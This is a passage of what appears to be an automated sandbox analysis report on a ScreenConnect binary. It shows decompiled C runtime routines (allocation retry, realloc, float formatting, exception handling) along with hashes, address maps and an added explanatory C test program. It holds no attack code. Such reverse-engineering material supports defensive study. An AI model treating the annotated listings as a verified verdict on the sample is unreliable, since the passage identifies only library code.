                                                                          • __CxxThrowException@8.LIBCMT ref: 003F21B9
                                                                            • Part of subcall function 003F496E: RaiseException.KERNEL32(?,?,003F13F9,00402B0C,00000000,765747B0,?,?,?,003F21BE,003F13F9,00402B0C,?,00000001), ref: 003F49C3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
• Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp
• Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp
• Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp
• Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                          • String ID: bad allocation
                                                                          • API String ID: 1059622496-2104205924
                                                                          • Opcode ID: 085d90029e95639cacd3c85a9009c2598f413f80d321a15054be1850e7689f9e
                                                                          • Instruction ID: 0283dc9755d97b1a43e117aae0acc90919ee542fd990b374fcd0bee089f572cb
                                                                          • Opcode Fuzzy Hash: 085d90029e95639cacd3c85a9009c2598f413f80d321a15054be1850e7689f9e
                                                                          • Instruction Fuzzy Hash: 9801D67110421DB6CB03BA98ED06DFFBBAC9F01750F500566FF04A6591EBB19A40C1D5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
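The function E003F1B16 above is worth recognising quickly so that triage time is not spent on it: a loop that calls _malloc, consults a new-handler on failure, and throws std::bad_alloc ("bad allocation") only when the handler gives up. The C program below is an added example, not code from the report or from the sample, that re-creates that retry contract in plain C so the three outcomes (retry succeeds, handler gives up, no handler registered) can be exercised without exhausting the heap. The identification of E003F493B as _callnewh is an assumption; the report names only _malloc, std::exception::exception and __CxxThrowException@8 for this function. The fail-counting malloc wrapper and the handler are constructed test hooks.

```c
/* Added example (not from the report or the sample): the MSVC CRT
 * operator new retry loop that E003F1B16 appears to implement,
 * written in plain C. The CRT throws std::bad_alloc when the handler
 * gives up; this C version returns NULL at that point instead.
 * Mapping E003F493B to _callnewh is an assumption. */
#include <stddef.h>
#include <stdlib.h>

/* A new-handler returns nonzero if it freed something and the
 * allocation should be retried, zero if nothing more can be done. */
typedef int (*new_handler_t)(size_t size);

/* Constructed test hooks: fail the first `fail_count` malloc calls so the
 * retry path can be driven deterministically. */
static int fail_count = 0;
static int malloc_calls = 0;
static int handler_calls = 0;

static void *fallible_malloc(size_t size)
{
    malloc_calls++;
    if (fail_count > 0) {
        fail_count--;
        return NULL;
    }
    return malloc(size);
}

/* Mirrors the decompiled loop:
 *   while (1) { p = _malloc(n); if (p) break;
 *               if (!_callnewh(n)) throw bad_alloc("bad allocation"); } */
void *crt_style_new(size_t size, new_handler_t handler)
{
    for (;;) {
        void *p = fallible_malloc(size);
        if (p != NULL)
            return p;
        if (handler == NULL || handler(size) == 0)
            return NULL; /* CRT: construct and throw std::bad_alloc here */
    }
}

/* A handler that can release a reserve exactly once, then gives up. */
static int release_reserve_once(size_t size)
{
    (void)size;
    handler_calls++;
    return handler_calls == 1;
}

/* Scenario helpers return 1 when the observed behaviour matches the
 * contract, so a test can assert on them. */
int scenario_retry_succeeds(void)
{
    fail_count = 1;
    malloc_calls = 0;
    handler_calls = 0;
    void *p = crt_style_new(64, release_reserve_once);
    int ok = (p != NULL) && malloc_calls == 2 && handler_calls == 1;
    free(p);
    return ok;
}

int scenario_handler_gives_up(void)
{
    fail_count = 5;
    malloc_calls = 0;
    handler_calls = 0;
    void *p = crt_style_new(64, release_reserve_once);
    /* first failure: handler returns 1, retry fails, handler returns 0 */
    int ok = (p == NULL) && malloc_calls == 2 && handler_calls == 2;
    free(p);
    return ok;
}

int scenario_no_handler(void)
{
    fail_count = 1;
    malloc_calls = 0;
    handler_calls = 0;
    void *p = crt_style_new(64, NULL);
    int ok = (p == NULL) && malloc_calls == 1 && handler_calls == 0;
    free(p);
    return ok;
}
```

The retry-until-handler-gives-up shape, together with the "bad allocation" string and the std::exception constructor immediately before a __CxxThrowException@8 call, is what marks this block as CRT runtime code rather than something the sample's author wrote; the `asm("int3")` after the throw is simply the decompiler continuing past a call that never returns.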

Control-flow Graph (basic blocks: id, address range, calls made, successor blocks)
• 372: 3fcce4-3fccfa, call 3f2690 -> 375, 376
• 375: 3fce9e -> 377
• 376: 3fcd00-3fcd03 -> 375, 378
• 377: 3fcea0-3fcea5, call 3f26d5
• 378: 3fcd09-3fcd0e -> 380, 381
• 380: 3fcd1c-3fcd23 -> 382, 383
• 381: 3fcd10-3fcd16 -> 375, 380
• 382: 3fcd2a-3fcd32 -> 385, 386
• 383: 3fcd25-3fcd28 -> 382
• 385: 3fcd34-3fcd37 -> 386, 389
• 386: 3fcd83-3fcd8e -> 387, 388
• 387: 3fcdb9-3fcdbc -> 392, 393
• 388: 3fcd90-3fcd99, call 3fd115 -> 399, 400
• 389: 3fcd39-3fcd40 -> 386, 391
• 391: 3fcd42-3fcd53, call 3fd115 -> 400, 419
• 392: 3fce0f-3fce12 -> 395, 396
• 393: 3fcdbe-3fcdc7, call 3fd115 -> 400, 409
• 395: 3fce4d-3fce56, call 3fd115 -> 400, 410
• 396: 3fce14-3fce1d, call 3fd115 -> 400, 413
• 399: 3fcd9f-3fcdab, call 3fd115 -> 400, 418
• 400: 3fce82, call 3f4cb0 -> 414
• 409: 3fcdcd-3fcdd9, call 3fd115 -> 400, 421
• 410: 3fce58-3fce64, call 3fd115 -> 400, 427
• 413: 3fce1f-3fce2b, call 3fd115 -> 400, 429
• 414: 3fce87-3fce90 -> 377
• 418: 3fcdb1-3fcdb7 -> 423
• 419: 3fcd59-3fcd65, call 3fd115 -> 400, 434
• 421: 3fcddf-3fcdf5, call 3f4130 -> 414, 437
• 423: 3fcd6e-3fcd74 -> 430
• 427: 3fce66-3fce71, call 3fd115 -> 400, 442
• 429: 3fce2d-3fce4b, call 3fcc31, call 3f4130 -> 414
• 430: 3fcd75-3fcd7e, call 3fcc31 -> 414
• 434: 3fcd6b -> 423
• 437: 3fcdfb-3fcdfe -> 414, 441
• 441: 3fce04-3fce0a -> 430
• 442: 3fce73-3fce80 -> 414
                                                                          C-Code - Quality: 41%
                                                                          			E003FCCE4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                          				signed char* _t41;
                                                                          				intOrPtr _t42;
                                                                          				intOrPtr* _t64;
                                                                          				intOrPtr _t69;
                                                                          				signed int _t70;
                                                                          				signed char _t72;
                                                                          				signed char _t73;
                                                                          				signed char* _t95;
                                                                          				signed char _t100;
                                                                          				signed char** _t102;
                                                                          				signed char* _t105;
                                                                          				void* _t106;
                                                                          
                                                                          				_push(0xc);
                                                                          				_push(0x402f50);
                                                                          				E003F2690(__ebx, __edi, __esi);
                                                                          				_t69 = 0;
                                                                          				_t41 =  *(_t106 + 0x10);
                                                                          				_t72 = _t41[4];
                                                                          				if(_t72 == 0 ||  *((intOrPtr*)(_t72 + 8)) == 0) {
                                                                          					L34:
                                                                          					_t42 = 0;
                                                                          				} else {
                                                                          					_t100 = _t41[8];
                                                                          					if(_t100 != 0 || ( *_t41 & 0x80000000) != 0) {
                                                                          						_t73 =  *_t41;
                                                                          						_t102 =  *(_t106 + 0xc);
                                                                          						if(_t73 >= 0) {
                                                                          							_t102 =  &(_t102[3]) + _t100;
                                                                          						}
                                                                          						 *((intOrPtr*)(_t106 - 4)) = _t69;
                                                                          						_t105 =  *(_t106 + 0x14);
                                                                          						if(_t73 >= 0 || ( *_t105 & 0x00000010) == 0) {
                                                                          							L14:
                                                                          							_push(1);
                                                                          							_t16 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0xff63f3e8
                                                                          							_push( *_t16);
                                                                          							if((_t73 & 0x00000008) == 0) {
                                                                          								if(( *_t105 & 0x00000001) == 0) {
                                                                          									if(_t105[0x18] != _t69) {
                                                                          										if(E003FD115() == 0) {
                                                                          											goto L32;
                                                                          										} else {
                                                                          											_push(1);
                                                                          											if(E003FD115(_t102) == 0 || E003FD115(_t105[0x18]) == 0) {
                                                                          												goto L32;
                                                                          											} else {
                                                                          												_t70 = 0;
                                                                          												_t69 = (_t70 & 0xffffff00 | ( *_t105 & 0x00000004) != 0x00000000) + 1;
                                                                          												 *((intOrPtr*)(_t106 - 0x1c)) = _t69;
                                                                          											}
                                                                          										}
                                                                          									} else {
                                                                          										if(E003FD115() == 0) {
                                                                          											goto L32;
                                                                          										} else {
                                                                          											_push(1);
                                                                          											if(E003FD115(_t102) == 0) {
                                                                          												goto L32;
                                                                          											} else {
                                                                          												_t32 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0xff63f3e8
                                                                          												E003F4130(_t102, E003FCC31( *_t32,  &(_t105[8])), _t105[0x14]);
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									if(E003FD115() == 0) {
                                                                          										goto L32;
                                                                          									} else {
                                                                          										_push(1);
                                                                          										if(E003FD115(_t102) == 0) {
                                                                          											goto L32;
                                                                          										} else {
                                                                          											_t25 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0xff63f3e8
                                                                          											E003F4130(_t102,  *_t25, _t105[0x14]);
                                                                          											if(_t105[0x14] == 4 &&  *_t102 != 0) {
                                                                          												_push( &(_t105[8]));
                                                                          												_push( *_t102);
                                                                          												goto L13;
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							} else {
                                                                          								if(E003FD115() == 0) {
                                                                          									goto L32;
                                                                          								} else {
                                                                          									_push(1);
                                                                          									if(E003FD115(_t102) == 0) {
                                                                          										goto L32;
                                                                          									} else {
                                                                          										_t20 =  *((intOrPtr*)(_t106 + 8)) + 0x18; // 0xff63f3e8
                                                                          										_t95 =  *_t20;
                                                                          										goto L12;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t64 =  *0x405f60; // 0x0
                                                                          							if(_t64 == 0) {
                                                                          								goto L14;
                                                                          							} else {
                                                                          								 *(_t106 + 0x10) =  *_t64();
                                                                          								_push(1);
                                                                          								if(E003FD115(_t65) == 0) {
                                                                          									L32:
                                                                          									E003F4CB0();
                                                                          								} else {
                                                                          									_push(1);
                                                                          									if(E003FD115(_t102) == 0) {
                                                                          										goto L32;
                                                                          									} else {
                                                                          										_t95 =  *(_t106 + 0x10);
                                                                          										L12:
                                                                          										 *_t102 = _t95;
                                                                          										_push( &(_t105[8]));
                                                                          										_push(_t95);
                                                                          										L13:
                                                                          										 *_t102 = E003FCC31();
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          						 *((intOrPtr*)(_t106 - 4)) = 0xfffffffe;
                                                                          						_t42 = _t69;
                                                                          					} else {
                                                                          						goto L34;
                                                                          					}
                                                                          				}
                                                                          				return E003F26D5(_t42);
                                                                          			}
Per-line addresses of the C-code above (0x00000000 where a line has no address): 0x003fcce4, 0x003fcce6, 0x003fcceb, 0x003fccf0, 0x003fccf2, 0x003fccf5, 0x003fccfa, 0x003fce9e, 0x003fce9e, 0x003fcd09, 0x003fcd09, 0x003fcd0e, 0x003fcd1c, 0x003fcd1e, 0x003fcd23, 0x003fcd28, 0x003fcd28, 0x003fcd2a, 0x003fcd2d, 0x003fcd32, 0x003fcd83, 0x003fcd83, 0x003fcd88, 0x003fcd88, 0x003fcd8e, 0x003fcdbc, 0x003fce12, 0x003fce56, 0x00000000, 0x003fce58, 0x003fce58, 0x003fce64, 0x00000000, 0x003fce73, 0x003fce78, 0x003fce7c, 0x003fce7d, 0x003fce7d, 0x003fce64, 0x003fce14, 0x003fce1d, 0x00000000, 0x003fce1f, 0x003fce1f, 0x003fce2b, 0x00000000, 0x003fce2d, 0x003fce37, 0x003fce43, 0x003fce48, 0x003fce2b, 0x003fce1d, 0x003fcdbe, 0x003fcdc7, 0x00000000, 0x003fcdcd, 0x003fcdcd, 0x003fcdd9, 0x00000000, 0x003fcddf, 0x003fcde5, 0x003fcde9, 0x003fcdf5, 0x003fce07, 0x003fce08, 0x00000000, 0x003fce08, 0x003fcdf5, 0x003fcdd9, 0x003fcdc7, 0x003fcd90, 0x003fcd99, 0x00000000, 0x003fcd9f, 0x003fcd9f, 0x003fcdab, 0x00000000, 0x003fcdb1, 0x003fcdb4, 0x003fcdb4, 0x00000000, 0x003fcdb4, 0x003fcdab, 0x003fcd99, 0x003fcd39, 0x003fcd39, 0x003fcd40, 0x00000000, 0x003fcd42, 0x003fcd44, 0x003fcd47, 0x003fcd53, 0x003fce82, 0x003fce82
                                                                          0x003fcd59
                                                                          0x003fcd59
                                                                          0x003fcd65
                                                                          0x00000000
                                                                          0x003fcd6b
                                                                          0x003fcd6b
                                                                          0x003fcd6e
                                                                          0x003fcd6e
                                                                          0x003fcd73
                                                                          0x003fcd74
                                                                          0x003fcd75
                                                                          0x003fcd7c
                                                                          0x003fcd7c
                                                                          0x003fcd65
                                                                          0x003fcd53
                                                                          0x003fcd40
                                                                          0x003fce87
                                                                          0x003fce8e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x003fcd0e
                                                                          0x003fcea5

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustPointer_memmove
                                                                          • String ID:
                                                                          • API String ID: 1721217611-0
                                                                          • Opcode ID: 09101293cf233db6767811235965d21c73178d7906e29aefc458f63cd75c2bf1
                                                                          • Instruction ID: 8710a61fdbe283efc599b721d3c15f2e07b8f9b418a719004f054f02ce2333fb
                                                                          • Opcode Fuzzy Hash: 09101293cf233db6767811235965d21c73178d7906e29aefc458f63cd75c2bf1
                                                                          • Instruction Fuzzy Hash: DE41D43129430F5EEB2B5E24DA82B7A37F9AF50720F25502DFB448B5E1EB71D881D650
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 100%
                                                                          			E003F84DA(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                          				char _v8;
                                                                          				intOrPtr _v12;
                                                                          				int _v20;
                                                                          				int _t35;
                                                                          				int _t38;
                                                                          				int _t42;
                                                                          				intOrPtr* _t44;
                                                                          				int _t47;
                                                                          				short* _t49;
                                                                          				intOrPtr _t50;
                                                                          				intOrPtr _t54;
                                                                          				int _t55;
                                                                          				int _t59;
                                                                          				char* _t62;
                                                                          
                                                                          				_t62 = _a8;
                                                                          				if(_t62 == 0) {
                                                                          					L5:
                                                                          					return 0;
                                                                          				}
                                                                          				_t50 = _a12;
                                                                          				if(_t50 == 0) {
                                                                          					goto L5;
                                                                          				}
                                                                          				if( *_t62 != 0) {
                                                                          					E003F4F96( &_v20, _a16);
                                                                          					_t35 = _v20;
                                                                          					__eflags =  *(_t35 + 0xa8);
                                                                          					if( *(_t35 + 0xa8) != 0) {
                                                                          						_t38 = E003F841C( *_t62 & 0x000000ff,  &_v20);
                                                                          						__eflags = _t38;
                                                                          						if(_t38 == 0) {
                                                                          							__eflags = _a4;
                                                                          							_t59 = 1;
                                                                          							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                                          							__eflags = _t42;
                                                                          							if(_t42 != 0) {
                                                                          								L21:
                                                                          								__eflags = _v8;
                                                                          								if(_v8 != 0) {
                                                                          									_t54 = _v12;
                                                                          									_t31 = _t54 + 0x70;
                                                                          									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                          									__eflags =  *_t31;
                                                                          								}
                                                                          								return _t59;
                                                                          							}
                                                                          							L20:
                                                                          							_t44 = E003F2218();
                                                                          							_t59 = _t59 | 0xffffffff;
                                                                          							__eflags = _t59;
                                                                          							 *_t44 = 0x2a;
                                                                          							goto L21;
                                                                          						}
                                                                          						_t59 = _v20;
                                                                          						__eflags =  *(_t59 + 0x74) - 1;
                                                                          						if( *(_t59 + 0x74) <= 1) {
                                                                          							L15:
                                                                          							__eflags = _t50 -  *(_t59 + 0x74);
                                                                          							L16:
                                                                          							if(__eflags < 0) {
                                                                          								goto L20;
                                                                          							}
                                                                          							__eflags = _t62[1];
                                                                          							if(_t62[1] == 0) {
                                                                          								goto L20;
                                                                          							}
                                                                          							L18:
                                                                          							_t59 =  *(_t59 + 0x74);
                                                                          							goto L21;
                                                                          						}
                                                                          						__eflags = _t50 -  *(_t59 + 0x74);
                                                                          						if(__eflags < 0) {
                                                                          							goto L16;
                                                                          						}
                                                                          						__eflags = _a4;
                                                                          						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                                                          						_t59 = _v20;
                                                                          						__eflags = _t47;
                                                                          						if(_t47 != 0) {
                                                                          							goto L18;
                                                                          						}
                                                                          						goto L15;
                                                                          					}
                                                                          					_t55 = _a4;
                                                                          					__eflags = _t55;
                                                                          					if(_t55 != 0) {
                                                                          						 *_t55 =  *_t62 & 0x000000ff;
                                                                          					}
                                                                          					_t59 = 1;
                                                                          					goto L21;
                                                                          				}
                                                                          				_t49 = _a4;
                                                                          				if(_t49 != 0) {
                                                                          					 *_t49 = 0;
                                                                          				}
                                                                          				goto L5;
                                                                          			}

                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003F8510
                                                                          • __isleadbyte_l.LIBCMT ref: 003F853E
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 003F856C
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 003F85A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          • Opcode ID: ef3096bf0b4c777e21136d8026b36126f76ef6ceadbaa6ce92432abb40dc7038
                                                                          • Instruction ID: 2bf23b7970497822b34d62db2309bd3d2a375dbba815f63148c4ee1d73f18b98
                                                                          • Opcode Fuzzy Hash: ef3096bf0b4c777e21136d8026b36126f76ef6ceadbaa6ce92432abb40dc7038
                                                                          • Instruction Fuzzy Hash: 1231723160025EEFDB2B8F65CC45BBA7BA9FF42310F164529F9598B1A0EB31D850DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 95%
                                                                          			E003F3E3D(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                                          				void* _t7;
                                                                          				void* _t8;
                                                                          				intOrPtr* _t9;
                                                                          				intOrPtr* _t12;
                                                                          				void* _t20;
                                                                          				long _t31;
                                                                          
                                                                          				if(_a4 != 0) {
                                                                          					_t31 = _a8;
                                                                          					if(_t31 != 0) {
                                                                          						_push(__ebx);
                                                                          						while(_t31 <= 0xffffffe0) {
                                                                          							if(_t31 == 0) {
                                                                          								_t31 = _t31 + 1;
                                                                          							}
                                                                          							_t7 = HeapReAlloc(L"lation", 0, _a4, _t31);
                                                                          							_t20 = _t7;
                                                                          							if(_t20 != 0) {
                                                                          								L17:
                                                                          								_t8 = _t20;
                                                                          							} else {
                                                                          								if( *0x405f40 == _t7) {
                                                                          									_t9 = E003F2218();
                                                                          									 *_t9 = E003F222B(GetLastError());
                                                                          									goto L17;
                                                                          								} else {
                                                                          									if(E003F493B(_t7, _t31) == 0) {
                                                                          										_t12 = E003F2218();
                                                                          										 *_t12 = E003F222B(GetLastError());
                                                                          										L12:
                                                                          										_t8 = 0;
                                                                          									} else {
                                                                          										continue;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          							goto L14;
                                                                          						}
                                                                          						E003F493B(_t6, _t31);                            // _callnewh(): request larger than the heap maximum
                                                                          						 *((intOrPtr*)(E003F2218())) = 0xc;              // errno = ENOMEM (0xc)
                                                                          						goto L12;
                                                                          					} else {
                                                                          						E003F1B1F(_a4);                                  // requested size 0: free the block and return NULL
                                                                          						_t8 = 0;
                                                                          					}
                                                                          					L14:
                                                                          					return _t8;
                                                                          				} else {
                                                                          					return E003F477C(__ebx, __edx, __edi, _a8);      // NULL block: plain malloc (the _malloc / HeapAlloc refs below)
                                                                          				}
                                                                          			}









                                                                          Instruction addresses for the listing above (decompiler line-to-address map):
                                                                          0x003f3e44 0x003f3e52 0x003f3e57 0x003f3e66 0x003f3e99 0x003f3e6b 0x003f3e6d 0x003f3e6d 0x003f3e7a 0x003f3e80 0x003f3e84 0x003f3ee4 0x003f3ee4 0x003f3e86 0x003f3e8c 0x003f3ece 0x003f3ee2 0x00000000 0x003f3e8e 0x003f3e97 0x003f3eb6 0x003f3eca 0x003f3eb0 0x003f3eb0 0x00000000 0x00000000 0x00000000 0x003f3e97 0x003f3e8c 0x00000000 0x003f3eb2 0x003f3e9f 0x003f3eaa 0x00000000 0x003f3e59 0x003f3e5c 0x003f3e62 0x003f3e62 0x003f3eb3 0x003f3eb5 0x003f3e46 0x003f3e50 0x003f3e50

                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 003F3E49
                                                                            • Part of subcall function 003F477C: __FF_MSGBANNER.LIBCMT ref: 003F4793
                                                                            • Part of subcall function 003F477C: __NMSG_WRITE.LIBCMT ref: 003F479A
                                                                            • Part of subcall function 003F477C: HeapAlloc.KERNEL32(00960000,00000000,00000001,00000000,00000000,00000000,?,003F2611,00000000,00000000,00000000,00000000,?,003F4A9B,00000018,00402C10), ref: 003F47BF
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap_malloc
                                                                          • String ID:
                                                                          • API String ID: 3293231637-0
                                                                          • Opcode ID: 177810759eb1be7f4978009c650fa0830197783d9e559306507d608a8fef0382
                                                                          • Instruction ID: 8b0109bc76ec18691a9f26e35e6788209086762aa184647feaade757bb240996
                                                                          • Opcode Fuzzy Hash: 177810759eb1be7f4978009c650fa0830197783d9e559306507d608a8fef0382
                                                                          • Instruction Fuzzy Hash: B611E33350521EFADB633B75AC4567F379CAF20360F114525FB44AE2A0DB34CA8086A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E003F9D6D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                          				intOrPtr _t25;
                                                                          				void* _t26;
                                                                          
                                                                          				_t25 = _a16;                                        // printf-style conversion character
                                                                          				if(_t25 == 0x65 || _t25 == 0x45) {                  // 'e' / 'E'
                                                                          					_t26 = E003FA2BE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                          					goto L9;
                                                                          				} else {
                                                                          					_t34 = _t25 - 0x66;
                                                                          					if(_t25 != 0x66) {                              // not 'f'
                                                                          						__eflags = _t25 - 0x61;
                                                                          						if(_t25 == 0x61) {                          // 'a'
                                                                          							L7:
                                                                          							_t26 = E003F9DF3(_a4, _a8, _a12, _a20, _a24, _a28);
                                                                          						} else {
                                                                          							__eflags = _t25 - 0x41;
                                                                          							if(__eflags == 0) {                     // 'A'
                                                                          								goto L7;
                                                                          							} else {                                // remaining conversions ('g' / 'G'; the API ID below lists __cftog_l)
                                                                          								_t26 = E003FA539(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                          							}
                                                                          						}
                                                                          						L9:
                                                                          						return _t26;
                                                                          					} else {                                        // 'f'
                                                                          						return E003FA478(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                          					}
                                                                          				}
                                                                          			}





                                                                          Instruction addresses for the listing above (decompiler line-to-address map):
                                                                          0x003f9d70 0x003f9d76 0x003f9de9 0x00000000 0x003f9d7d 0x003f9d7d 0x003f9d80 0x003f9d9b 0x003f9d9e 0x003f9dbe 0x003f9dd0 0x003f9da0 0x003f9da0 0x003f9da3 0x00000000 0x003f9da5 0x003f9db7 0x003f9db7 0x003f9da3 0x003f9dee 0x003f9df2 0x003f9d82 0x003f9d9a 0x003f9d9a 0x003f9d80

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                          • String ID:
                                                                          • API String ID: 3016257755-0
                                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction ID: effc67f6daf09f16d298259f4d2c94a1fea39bccfb685214f5c9d6f60506dc00
                                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction Fuzzy Hash: D701787600014EBBCF136F84CC02AEE3F26BB08340B298416FB1899131D336C9B1AB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 20%
                                                                          			E003FC628(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                          				void* __edi;
                                                                          				void* __ebp;
                                                                          				void* _t25;
                                                                          				void* _t28;
                                                                          				intOrPtr _t29;
                                                                          				void* _t30;
                                                                          				intOrPtr* _t31;
                                                                          				void* _t33;
                                                                          
                                                                          				_t30 = __esi;
                                                                          				_t27 = __ebx;
                                                                          				_t35 = _a28;
                                                                          				_t29 = _a8;
                                                                          				if(_a28 != 0) {                                   // a catch object to construct before entering the handler
                                                                          					_push(_a28);
                                                                          					_push(_a24);
                                                                          					_push(_t29);
                                                                          					_push(_a4);
                                                                          					E003FCC56(__ebx, _t29, __esi, _t35);          // ___BuildCatchObject (ref 003FC63F)
                                                                          					_t33 = _t33 + 0x10;
                                                                          				}
                                                                          				_t36 = _a40;
                                                                          				_push(_a4);
                                                                          				if(_a40 != 0) {
                                                                          					_push(_a40);
                                                                          				} else {
                                                                          					_push(_t29);
                                                                          				}
                                                                          				E003FC1D2(_t28);                                  // _UnwindNestedFrames (ref 003FC656)
                                                                          				_push(_t30);
                                                                          				_t31 = _a32;
                                                                          				_push( *_t31);
                                                                          				_push(_a20);
                                                                          				_push(_a16);
                                                                          				_push(_t29);
                                                                          				E003FCEF4(_t27, _t31, _t36);                      // ___FrameUnwindToState (ref 003FC668)
                                                                          				_push(0x100);
                                                                          				_push(_a36);
                                                                          				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
                                                                          				_push( *((intOrPtr*)(_a24 + 0xc)));
                                                                          				_push(_a20);
                                                                          				_push(_a12);
                                                                          				_push(_t29);
                                                                          				_push(_a4);
                                                                          				_t25 = E003FC422(_t27, _t29, _t31, _t36);         // CallCatchBlock (ref 003FC68C): runs the handler, returns the continuation address
                                                                          				if(_t25 != 0) {
                                                                          					E003FC1A0(_t25, _t29);                        // transfer control to the continuation address
                                                                          					return _t25;
                                                                          				}
                                                                          				return _t25;
                                                                          			}











                                                                          Instruction addresses for the listing above (decompiler line-to-address map):
